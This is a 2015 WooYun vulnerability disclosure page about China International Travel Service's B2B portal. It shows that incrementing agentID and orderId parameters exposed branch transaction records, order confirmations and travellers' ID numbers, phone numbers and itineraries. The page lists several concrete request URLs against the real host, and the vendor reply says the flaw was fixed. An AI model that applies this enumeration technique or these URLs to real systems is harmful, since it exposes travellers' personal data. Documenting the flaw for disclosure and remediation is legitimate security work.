当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126208

漏洞标题:旅游业安全之中国国旅全球所有营业部信息流水/订单ID/订单确认单/明细单/配送单/旅客私人信息/票务信息均泄露

相关厂商:中国国旅

漏洞作者: 黑暗游侠

提交时间:2015-07-12 09:41

修复时间:2015-07-20 11:34

公开时间:2015-07-20 11:34

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-12: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-20: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

黑产尚未利用,厂商加急处理

详细说明:

# 全球各地营业部所有流水+订单号:
通过遍历"agentID="来获得不同地区营业部的具体信息,可通过具体日期范围查询
如:

http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000179591
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000013098
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000089815
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000014830
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000133596
……
……


56.png


# 出境确认单遍历
修改"orderId="获得具体的订单确认信息,泄露旅客出发时间/目的地/人次/证件号/金额/邮件/电话等各类信息
如:

http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-25671&status=4&subtoAgentId=000066034&SSMoney=0.00
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-7349&status=7&subtoAgentId=000066034&SSMoney=0.00
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=071507-9225&status=7&subtoAgentId=000066034&SSMoney=0.00
……
……


无论过去的,还是实时的订单均遭到泄露,来看一张今天的 :

57.png


# 订单详单/游客详细信息单
遍历"orderId="来获取详单
如:

http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10452|000000137|000000137
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10451|000000137|000000137
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-104548|000000137|000000137
……
……


58.png


# 各地销售明细单
这东西打印下来可以干很多事情了
同样,遍历"orderId="
如:

http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-13461&companyId=GDGLGF&agentId=000000663
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-12712&companyId=GDGLGF&agentId=000000663
http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071506-9296&companyId=GDGLGF&agentId=000000663
……
……


59.png

漏洞证明:

修复方案:

黑产尚未利用,你们加急处理,能走高危漏洞流程最好,白帽子平常也非常辛苦

版权声明:转载请注明来源 黑暗游侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-13 09:18

厂商回复:

非常感谢您的报告,问题已处理,十分感谢您对中国国旅的支持。

最新状态:

2015-07-20:已修复